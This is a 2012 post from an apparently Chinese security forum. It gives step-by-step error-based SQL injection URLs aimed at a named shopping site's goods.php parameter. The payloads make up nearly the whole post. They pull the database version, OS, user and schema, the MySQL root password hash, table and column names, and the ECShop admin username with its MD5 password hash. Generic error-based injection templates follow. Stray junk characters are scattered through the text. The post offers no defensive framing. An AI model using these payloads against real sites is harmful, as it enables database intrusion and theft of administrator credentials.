找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2243|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 + M) Z& U3 N, R4 j+ @% i* x; b" B8 K
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& n, E& m: i, `. R/ h" @& H$ F. l

- a/ o- _; B+ P8 ~+ W判断系统6 ~2 u- m0 y9 @

" d; T, M* ^. F1 Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" N0 k2 T) J! _+ e2 P4 ]5 X/ I1 V/ h2 n$ x
+ @+ Z0 W$ c% o) ?6 H

4 `8 I$ C4 u# i8 b当前 user()" m3 i" y" O; k# R# ^
' L% d3 Q! _# V. L3 W
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% @! v. _- o9 |& Z: B5 l
6 ?- I4 N3 s; G. f, X% V* y: e
. h; g9 b9 G) _7 x0 M' \9 R
8 |; D' l, u% f& g- p当前 database()
! I9 O; |5 p7 e+ ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" v9 |' F3 Y* e5 a  m6 Y5 i( T

0 `/ ?' x* Q9 Z  `) `" N: t* o6 {; o

; _# r- J6 A/ j3 }; l( u
: f2 T/ `# n( l4 Z; Broot hash
5 G# Y  X  [: H0 z; z( t% g& T
" L9 u2 p. @1 Phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' I  U- h* l3 P. l  D1 _3 R
% R* x+ K. J# ]; H# m& Q* W! j8 v0 e2 H2 {
% }- k1 a5 T3 Y& v  ?2 z9 k
当前 数据库表名
" \/ O; \) u% l4 k5 [" V1 o
" l" d/ i6 C& _; Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 l+ |8 q/ z% \2 T. l- J7 ?6 G
2 P- d8 f$ D  u9 m" x' B
3 ~% {! U4 K( k( g; t/ x# O
5 {! Q6 c0 T* ~当前 数据库 user_name 字段7 i0 c6 P% S" h% ?! {4 V

$ ^3 e% }0 D! H  whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ i" ^4 n: i+ N1 _8 |
3 z/ r8 K6 l1 V! t$ c' Z) P当前 数据库 字段 password+ |; O4 U: T2 `& q4 Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
+ j% X' R9 p9 R* Y6 [4 Q' c! T  G( l$ Y& r# K0 [" A5 m# d

. I" @4 V+ |$ J: \" w: E8 z6 x
# F$ N* |5 n: U: C# A4 k) b获得 admin passwd(md5)) s- d5 n% I1 w! M( A7 C

; A4 d7 `; x. w5 G# x1 N* d5 n9 K/ C! J
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. F. S( P, G. ^0 w" e$ y: _9 |- ^% Q3 ?; m# F1 N! g
报错注射
- t6 A. @7 q0 r1 y/ \/ p) u2 x/ fSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)" |, d% M0 F3 B8 }& S

# B  K% e8 W$ {3 V/ S, Y- _SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
4 U# i: k# R, a6 t# p0 t. g$ ^: R+ r% F/ A6 ~2 g
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表